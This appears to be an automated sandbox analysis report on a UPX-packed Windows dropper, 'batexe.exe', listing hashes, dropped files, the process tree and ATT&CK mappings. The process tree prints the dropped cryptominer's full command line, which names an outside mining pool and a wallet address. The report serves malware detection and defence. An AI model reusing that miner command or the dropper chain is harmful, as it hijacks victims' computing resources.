73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
24/02/2024, 04:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4520	b2e.exe
4712	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4712	cpuminer-sse2.exe
4712	cpuminer-sse2.exe
4712	cpuminer-sse2.exe
4712	cpuminer-sse2.exe
4712	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3584-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3584 wrote to memory of 4520	3584	batexe.exe	75
PID 3584 wrote to memory of 4520	3584	batexe.exe	75
PID 3584 wrote to memory of 4520	3584	batexe.exe	75
PID 4520 wrote to memory of 1924	4520	b2e.exe	76
PID 4520 wrote to memory of 1924	4520	b2e.exe	76
PID 4520 wrote to memory of 1924	4520	b2e.exe	76
PID 1924 wrote to memory of 4712	1924	cmd.exe	79
PID 1924 wrote to memory of 4712	1924	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3584
- C:\Users\Admin\AppData\Local\Temp\7C83.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7C83.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7C83.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7E67.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1924
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7C83.tmp\b2e.exe

Filesize
4.0MB

MD5
a0f40a1f69f2cff6507c4f478a43c190

SHA1
1a329f7c78f8067945a946d55a0f6d49e0093009

SHA256
4cd3e56b90cf436ca84a3c66ee412033032b5f521f463834ae308c88fa3ddecf

SHA512
583a8074c53831856fd86f23ff2e8a541259024445c9b2c74f9253a9802ce659ff4997489c9dd3ab32aaae287cec0c6c5c471034d15d5ff583a745322f5a251c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7C83.tmp\b2e.exe

Filesize
3.8MB

MD5
76f68b3a48d98fee00bd53b2433e664b

SHA1
93ac86c7ea44114347d8fdd12170144f9596144d

SHA256
3f3f634c0b974bb20a1041cfd64ea1b9d7ea05480931122b79c50d5a6cc4ef18

SHA512
7e458caaa1de737e8ea9ae344f905fb487704582fdc25f4019dd9fee9b168e4fc77cf14233892023b8439ea2c79f642741b19a514fe116f1b6ec8051a727e9c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7E67.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
825KB

MD5
82ae454ac86317a9ef3a0caa87ca9592

SHA1
1bc45555394557af72637a4eab6c048cbbeb3d2f

SHA256
80c7960fc73fff95bc2c54004c8a1ca644ab22ebc7b2e8f51404509b15b772c7

SHA512
ba8c68e3f363d1b8bb432ae8c799309f179a245990994bb7304e0a7ad1ff3a5e435b1fb15899b49beff74aa7d9d158c5f8c40cfe48aeaa3dbb435ffa49d687cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
992KB

MD5
3b9bfde354a771df4b1d7a8e72f9e346

SHA1
003822863e8c688b931e8cdfc921d34ad15fd832

SHA256
741d8454660b831756fabde26101a0e991626539e86c1c8012a954276c64d5f6

SHA512
94ea338e8cb28e73a24973dddf47042d565ddc6e9a2fcaf87ca547a6795b0067103beab3efa34a0192716359c7cfba5b642a7ebea2f1b5716001a04f89e2adba

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
743KB

MD5
9d4b8c8e12c49209f6660afaf4d457e6

SHA1
11149203a82a735e9701930cfe138d86208970f5

SHA256
74bc9ebb33adef692384490fbf91b43210b24ca5948151aef93df9c817d7c870

SHA512
6d59b34e7d385ab9a6d4f86fb00f5f43f2184a04079051e5f20cd1a44269211108d98e6e8ff5698cb1984155bd8a35a114574960b2c7b55f7f6a34b86eb60289

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
652KB

MD5
fa8eb3bf688c1d64815d2c650f3b87e5

SHA1
d8e5488e3eed41184931480270a4dffaed9158fa

SHA256
32c62fd981eb763553345be2c0b252eacf7f91410ced586607d43825775d9573

SHA512
30b815e65a633368204175881d99e32df791a0b30d9a7e39e284b6375d837dfca05c31664ace657e1effca9d034a94fa8862d828cab584fff385856907df68bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
442KB

MD5
2824b7ca71d2183bd6685cbd98776385

SHA1
9692e404666ffeea2d1b709adf717257037c6466

SHA256
74132b91e8f67b7af3d860a65c49b2d68d605bd592357981f6945eb66785d2dd

SHA512
50b502068446555b894a6a5a0daa7d0db3e29eff78bb3d71115b27d4994eae9e7d701e1097b895b78617dc39184f35c6a18e14f0a43eddb6c1c471354205becf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
583KB

MD5
ca9c69c28d8c7554e29e0a43b884fdda

SHA1
cc606e20d734a6133878e1cb9bc7dc0a54c40744

SHA256
4fb67263d78020a47b608e5a9cbc67178b55c13b3251b709f97370eaf62cc3cc

SHA512
1c6a3948c3d36a9c09ddf5346f2aced661ea7a7de705b06c98ebeef050184e0404025a3e2a44df4e538b1b064198fec13e7d66f81d19336c2c54cbd79fded68a

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
663KB

MD5
041c10b58786e686b2972a16af6f4357

SHA1
c98b4b6ba9aa5bc42dea83fab4e3d9eed2eac112

SHA256
f3417f0f185e40cd0b7e85296246af970ad82ab27efa547f7215ca1a9591bdaa

SHA512
f35cbe3674cdc62855001251986789f85e410d91b50c9050dce08d056212383e4a546c9fa2b5b5e6da180efec0d6c912ee3130e21a182822818a114f2d3c51fc

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
431KB

MD5
edadeae0205d7a289f388a5ef56904e7

SHA1
f31c2714be382ebe020a5df0b8b2062edd5eb02b

SHA256
e0bcce594716e209a26c7385a004fcb5aebaf1f5d415938eb1eabf9292c80fbb

SHA512
3f48da2a82f6e0491924c134cbcf6eabe423a4c5c8eb5efc89ca3d9bd0291a1114afaeb21cf517a8810891c6bc2ced8df64885273c48f518f1f167eb3e5348e3

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
540KB

MD5
5b7a73185ccdd1e7963ef15168d49aec

SHA1
0fcb08449746789e1725cac42f1bf2a3916edfe1

SHA256
5ad11565247b7a9dd46f849c828b1131ca19cff0fa698396d78a317c72e0c538

SHA512
a968181a2dc06f31a74112ddd918b3172eceb4df0ad606624c2b57658235b68159a97ad524ded6c010b7e5b28e0e9359e5e942f71d344c1abc70a1e6e7bbc837

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
441KB

MD5
5eea03637b50165b92325328026b85ec

SHA1
9ad1838afe7c5cf68e37366a030d2d1cd2a1ac41

SHA256
70e1a4056ee69603101e7432159140f4050feb9f3b833ca7cb79bdd917867104

SHA512
18bd8175074ead0d684a1d362f5a8de6ab75e67d7bfbb3096481eca1ba3ce001489a3b88e8bfa662d515daa47394fb477112456b0eab59b889b924b76d883ec5

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
522KB

MD5
fa9f8d1ac87b0edfb7cf05c2b463ad82

SHA1
a7bb3677acf9c2d337416a01719ccdefecf37f65

SHA256
0f32a2a2ab27b7af8cf9c79c1f4a9ae6e0de314cceef2ebce68885521b93a206

SHA512
6d43c3dca4107d3f439cbdc09885749b8e857bb5c3485e74d7432edd0fb444315ae70bc17877885c9012214f926eaafba3a03c1b8d208f59c4d65f80188bcf6d

Download Submit
memory/3584-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4520-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4520-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4712-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4712-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4712-42-0x000000006D920000-0x000000006D9B8000-memory.dmp

Filesize
608KB

Download
memory/4712-44-0x0000000001110000-0x00000000029C5000-memory.dmp

Filesize
24.7MB

Download
memory/4712-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4712-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4712-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4712-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4712-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4712-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4712-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4712-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4712-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4712-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download